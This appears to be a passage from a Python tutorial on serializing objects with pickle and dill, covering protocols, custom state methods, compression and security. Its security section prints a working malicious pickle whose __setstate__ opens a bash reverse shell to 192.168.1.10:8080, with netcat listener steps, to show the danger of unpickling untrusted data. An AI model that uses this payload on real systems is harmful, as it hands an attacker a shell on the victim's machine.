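as_json = json.dumps(record)
from_json = json.loads(as_json)

# pickle is binary and Python-specific; it preserves the tuple.
as_pickle = pickle.dumps(record)
from_pickle = pickle.loads(as_pickle)

print(type(as_json).__name__, type(from_json["point"]).__name__)      # str list
print(type(as_pickle).__name__, type(from_pickle["point"]).__name__)  # bytes tuple

# Types outside the JSON data model (here a set) are rejected by default.
json_error = None
try:
    json.dumps({"tags": {"a", "b"}})
except TypeError as exc:
    json_error = exc
print(json_error)
```

Which module fits better depends on the use case: JSON when the data must be read by other languages or by people, pickle when only Python programs exchange arbitrary Python objects.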
Inside the pickle module
The pickle module contains four main functions:
pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
The first two functions are used for serialization, the other two for the reverse process. The difference between the first two is that dump writes the serialized result to an open binary file object, while dumps returns a bytes object. The same applies to load and loads: load reads from a file object, and loads reads from a bytes object.
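A short sketch of both pairs of functions side by side. The settings dictionary and the file name settings.pkl are assumptions made for illustration only.

```python
import os
import pickle
import tempfile

settings = {"epochs": 10, "layers": [64, 32]}  # hypothetical sample data

# dumps/loads work with a bytes object in memory.
blob = pickle.dumps(settings)
restored_from_bytes = pickle.loads(blob)

# dump/load work with a file object opened in binary mode.
with tempfile.TemporaryDirectory() as tmp_dir:
    path = os.path.join(tmp_dir, "settings.pkl")  # hypothetical file name
    with open(path, "wb") as fh:
        pickle.dump(settings, fh)
    with open(path, "rb") as fh:
        restored_from_file = pickle.load(fh)

print(restored_from_bytes == restored_from_file == settings)  # True
```

Note that the file must be opened in binary mode ("wb" and "rb"), because a pickle is a byte stream and not text.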
Consider an example. Suppose there is a user-defined class example_class with several attributes (a_number, a_string, a_list, a_dict, a_tuple), each of a different type.
The code below creates an instance of the class and serializes it. We then change the value of the inner dictionary. The object saved with pickle can be used to restore the original structure.
import pickle

class example_class:
    a_number = 35
    a_string = "hey"
    a_list = [1, 2, 3]
    a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
    a_tuple = (22, 23)

my_object = example_class()

my_pickled_object = pickle.dumps(my_object)  # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")

my_object.a_dict = None

my_unpickled_object = pickle.loads(my_pickled_object)  # Unpickling the object
print(
    f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")
$ python pickling.py
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'

This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
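Thus, pickle creates a deep copy of the original structure. Note that in this particular example the attributes are defined on the class rather than on the instance, so the pickled bytes hold only a reference to example_class, and the restored a_dict is looked up on the class itself.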
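The deep-copy behaviour is easier to see with data that is actually stored in the pickle. The sketch below uses a plain nested dictionary (a hypothetical stand-in for the object's state) and shows that the restored structure shares nothing with the original.

```python
import pickle

original = {"first": "a", "third": [1, 2, 3]}  # hypothetical sample data

# A pickle round trip rebuilds every nested object from scratch.
clone = pickle.loads(pickle.dumps(original))

# Mutating a nested list in the original does not affect the clone.
original["third"].append(4)

print(original["third"])                    # [1, 2, 3, 4]
print(clone["third"])                       # [1, 2, 3]
print(clone["third"] is original["third"])  # False
```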
Protocol formats of the pickle module
The pickle module is specific to Python: the results of serialization can only be read by another Python program. But even if you work only with Python, it is useful to know how the module has evolved over time, because compatibility depends on the protocol version. There are currently six protocol versions:
- 0: unlike the later protocols, it is human-readable.
- 1: the first binary format.
- 2: introduced in Python 2.3.
- 3: added in Python 3.0. It cannot be selected in Python 2.x.
- 4: added in Python 3.4. It supports a wider range of object sizes and types and has been the default protocol since Python 3.8.
- 5: added in Python 3.8. It supports out-of-band data and speeds up in-band data.
Note
Newer versions offer more features and improvements, but they are limited to newer interpreter versions. Keep this in mind when choosing a protocol. The highest protocol supported by the interpreter is stored in the pickle.HIGHEST_PROTOCOL attribute.
To select a specific protocol, pass the protocol version when calling the module function. Otherwise the version given by the pickle.DEFAULT_PROTOCOL attribute is used.
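As a rough illustration of protocol selection, the sketch below pickles the same object with every protocol the running interpreter supports. The data dictionary is hypothetical, and the printed numbers depend on the Python version, so no output is shown.

```python
import pickle

data = {"numbers": [1, 2, 3], "label": "demo"}  # hypothetical sample data

print("highest:", pickle.HIGHEST_PROTOCOL)
print("default:", pickle.DEFAULT_PROTOCOL)

sizes = {}
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
    blob = pickle.dumps(data, protocol=proto)
    # loads() detects the protocol on its own; no argument is needed.
    assert pickle.loads(blob) == data
    sizes[proto] = len(blob)

print(sizes)  # size in bytes per protocol version

# Protocols 2 and later start with the PROTO opcode (0x80)
# followed by the protocol number.
newest = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)
print(newest[:2])
```

If the pickle must be read by an older interpreter, an explicit lower protocol number is the safer choice; otherwise the default is usually sufficient.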
Picklable and unpicklable types
We already know that the pickle module serializes many more types than json, but still not all of them. Objects that pickle cannot serialize include database connections, open network sockets, and running threads. If you run into an unpicklable object, there are several ways to solve the problem. The first option is to use the third-party dill library.
The dill module extends the capabilities of pickle. According to the official documentation, it can serialize less common types, such as nested (inner) functions and lambda expressions. Let's check this with an example:
import pickle
square = lambda x : x * x
my_pickle = pickle.dumps(square)
If we try to run this program, we get an exception, because pickle cannot serialize a lambda function:
$ python pickling_error.py
Traceback (most recent call last):
  File "pickling_error.py", line 6, in <module>
    my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed
Let's try replacing pickle with dill (the library can be installed with pip):
import dill
square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
Run the code and you will see that the dill module serializes the lambda function without errors:
$ python pickling_dill.py
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'
Another feature of dill is that it can serialize an interpreter session:
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()
In this example, after starting the interpreter and entering a few expressions, we import the dill module and call dump_session() to serialize the session to the file test.pkl in the current directory:
$ ls test.pkl
4 -rw-r--r--@ 1 dave staff 439 Feb 3 10:52 test.pkl
Start a new interpreter instance and load the test.pkl file to restore the last session:
>>> import dill
>>> dill.load_session('test.pkl')
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>
Note
Before you start using dill instead of pickle, keep in mind that dill is not part of the Python standard library and is usually slower than pickle.
The dill module covers a much wider range of objects than pickle, but it does not solve every serialization problem. For example, even dill cannot serialize an object that contains a database connection.
In such cases you need to exclude the unserializable object from serialization and reinitialize it after deserialization.
To specify what should be included in serialization, use the __getstate__() method. If this method is not overridden, the instance's __dict__ is used by default.
The following example shows how to define a class with several attributes and exclude one attribute from serialization with __getstate__():
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)

print(my_new_instance.__dict__)
In this example we create an object with three attributes. Since one of the attributes is a lambda, it cannot be processed by pickle. Therefore, in __getstate__() we first copy the whole __dict__ and then remove the unpicklable attribute c.
If we run this example and then deserialize the object, we see that the new instance does not contain the attribute c:
$ python custom_pickling.py
{'a': 35, 'b': 'test'}
We can also perform additional initialization during deserialization, for example add the excluded object c back to the deserialized instance. The __setstate__() method is used for this:
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

    def __setstate__(self, state):
        self.__dict__ = state
        self.c = lambda x: x * x

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)

print(my_new_instance.__dict__)
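The same pattern applies to resources such as connections, sockets, or locks. The sketch below is an illustration under assumptions: the Counter class is hypothetical, and a threading.Lock stands in for any resource that cannot be pickled. The lock is dropped in __getstate__() and created again in __setstate__().

```python
import pickle
import threading

class Counter:
    """Hypothetical class that owns an unpicklable resource (a lock)."""

    def __init__(self):
        self.value = 0
        self._lock = threading.Lock()  # lock objects cannot be pickled

    def increment(self):
        with self._lock:
            self.value += 1

    def __getstate__(self):
        state = self.__dict__.copy()
        state.pop("_lock", None)  # leave the lock out of the pickle
        return state

    def __setstate__(self, state):
        self.__dict__.update(state)
        self._lock = threading.Lock()  # create a fresh lock after loading

counter = Counter()
counter.increment()

restored = pickle.loads(pickle.dumps(counter))
restored.increment()  # works because the lock was recreated

print(counter.value, restored.value)  # 1 2
```

For a real database connection, __setstate__() would typically reconnect using connection parameters that were kept in the pickled state; those details depend on the driver and are not shown here.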
Compressing pickled objects
The pickle data format is a compact binary representation of an object's structure, but we can still make it smaller with compression. To bzip2-compress a pickled string, you can use the bz2 module from the standard library:
>>> import pickle
>>> import bz2
>>> my_string = """Хотя формат данных pickle
является компактным двоичным представлением
структуры объекта, мы всё равно можем её
оптимизировать, используя bzip2 или gzip.
Для сжатия сериализованной строки можно
использовать модуль стандартной библиотеки
bz2. При использовании сжатия помните, что
файлы меньшего размера создаются за счет
более медленного алгоритма. И совсем малые
объекты не получают выигрыша при сжатии.
"""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
404
>>> len(compressed)
360
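A complete round trip could look like the sketch below. The payload is hypothetical and deliberately repetitive so that compression pays off; the sketch compares the size of the pickled bytes with the size of the compressed bytes, and also shows that a very small object gets larger, not smaller.

```python
import bz2
import pickle

# Hypothetical, deliberately repetitive payload.
payload = {"readings": [0.5] * 10_000, "label": "sensor-1"}

pickled = pickle.dumps(payload)
compressed = bz2.compress(pickled)
print(len(pickled), len(compressed))

# Decompress first, then unpickle, to get the object back.
restored = pickle.loads(bz2.decompress(compressed))
print(restored == payload)  # True

# For very small objects the bzip2 header outweighs any savings.
tiny = pickle.dumps(1)
tiny_compressed = bz2.compress(tiny)
print(len(tiny) < len(tiny_compressed))  # True
```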
Security of sending data in pickle format
Serialization is convenient when you need to save an object's state to disk or send it over a network. However, it is not always safe. As discussed above, any arbitrary code can run in the __setstate__() method when an object is deserialized, including an attacker's code.
A simple rule: never deserialize data that came from a suspicious source or over an untrusted network. To prevent man-in-the-middle attacks, use the hmac module from the standard library to create and verify signatures.
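Signing with hmac could be sketched as follows. This is a minimal illustration and not a complete protocol: SECRET_KEY, sign() and verify_and_load() are hypothetical names, and the sketch assumes that sender and receiver already share the key over a safe channel.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-real-shared-secret"  # hypothetical key
TAG_SIZE = hashlib.sha256().digest_size            # 32 bytes

def sign(obj):
    """Pickle obj and prepend an HMAC-SHA256 tag."""
    payload = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload

def verify_and_load(message):
    """Check the tag first and unpickle only if it matches."""
    tag, payload = message[:TAG_SIZE], message[TAG_SIZE:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch, refusing to unpickle")
    return pickle.loads(payload)

message = sign({"user": "alice", "score": 31})
print(verify_and_load(message))  # {'user': 'alice', 'score': 31}

# Flip one bit of the payload to simulate tampering in transit.
tampered = message[:-1] + bytes([message[-1] ^ 1])
try:
    verify_and_load(tampered)
except ValueError as exc:
    print(exc)  # signature mismatch, refusing to unpickle
```

The signature only proves that the data came from someone who knows the key and that it was not modified; it does not make a pickle from an untrusted sender safe.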
The following example shows how deserializing a pickle file sent by an attacker opens access to the system:
import pickle
import os

class foobar:
    def __init__(self):
        pass

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')

my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
In this example, during unpickling, __setstate__() executes a Bash command that opens a remote shell to the machine 192.168.1.10 on port 8080.
You can test this script on Mac or Linux by opening a terminal and running the nc command to listen on port 8080:
$ nc -l 8080
This will be the attacker's terminal. Then open a terminal on the same computer (or on another computer in the same network) and run the Python code above. The IP address in the code must be replaced with the IP address of the attacking terminal. By running the following command, the victim gives the attacker access:
$ python remote.py
When the victim runs the script, the Bash shell becomes active in the attacker's terminal:
$ nc -l 8080
bash: no job control in this shell
This console lets the attacker work directly on your system.
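One way to reduce this risk, when unpickling cannot be avoided, is to restrict which globals the unpickler may load. The sketch below follows the approach described in the Python documentation for pickle.Unpickler.find_class(); the allow-list SAFE_BUILTINS and the helper restricted_loads() are illustrative names, and a real allow-list would have to be chosen for the application.

```python
import builtins
import io
import pickle

# Illustrative allow-list: only these builtins may be loaded.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks for a global (class or function).
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    """Like pickle.loads(), but rejects globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Harmless data still loads.
print(restricted_loads(pickle.dumps([1, 2, range(15)])))  # [1, 2, range(0, 15)]

# A hand-written pickle that tries to call os.system is rejected
# before anything is executed.
malicious = b"cos\nsystem\n(S'echo hello world'\ntR."
try:
    restricted_loads(malicious)
except pickle.UnpicklingError as exc:
    print(exc)  # global 'os.system' is forbidden
```

This narrows the attack surface but does not replace the rule above: data from an untrusted source is better exchanged in a format such as JSON.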
Conclusion
Now you know how to use the pickle and dill modules to convert an object hierarchy with a complex structure into a byte stream. The structures can be saved to disk or sent over a network as a byte string. You also know that deserialization must be used with care. If you still have questions, ask them in the comments below the post.